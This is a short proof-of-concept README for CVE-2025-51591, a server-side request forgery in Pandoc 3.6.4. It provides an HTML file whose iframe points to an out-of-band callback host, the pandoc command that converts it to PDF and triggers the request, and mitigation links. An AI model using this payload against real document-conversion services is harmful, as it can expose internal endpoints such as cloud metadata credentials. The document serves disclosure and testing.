# CVE-2025-51591 Pandoc SSRF POC

<img width="1024" height="1024" alt="image" src="https://github.com/user-attachments/assets/e7f8e401-16b6-4918-b108-a61b3ff2821e" />

A Server-Side Request Forgery (SSRF) in JGM Pandoc v3.6.4 allows attackers to gain access to and compromise the whole infrastructure via injecting a crafted iframe.

# Install Pandoc
- https://pandoc.org/installing.html

# Payload Example

> ⚠️ replace iframe url to your own OAST url. ⚠️

```html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CVE-2025-51591 Proof Of Concept</title>
</head>

<body>
    <h1>
        CVE-2025-51591 Proof Of Concept
    </h1>
    <iframe src="http://h9rvkkqhe0tkmsaiqlhgm1yrvi19ped3.oastify.com/CVE-2025-51591" frameborder="0"></iframe>
</body>

</html>
```
# Convert Payload To PDF Using Pandoc
```
pandoc payload.html -o output1.pdf
```

<img width="1493" height="1142" alt="image" src="https://github.com/user-attachments/assets/e7ad4b45-820c-491b-840d-eea18270ed88" />



# Mitigate Strategies
- https://github.com/jgm/pandoc/issues/10682#issuecomment-2718343529
- https://pandoc.org/MANUAL.html#a-note-on-security

# References
- [Hackers Exploit Pandoc CVE-2025-51591 to Target AWS IMDS and Steal EC2 IAM Credentials](https://thehackernews.com/2025/09/hackers-exploit-pandoc-cve-2025-51591.html)
- [IMDS Abused: Hunting Rare Behaviors to Uncover Exploits](https://www.wiz.io/blog/imds-anomaly-hunting-zero-day)
- [SSRF When Generating PDFs from User-Controlled HTML](https://github.com/jgm/pandoc/issues/10682)
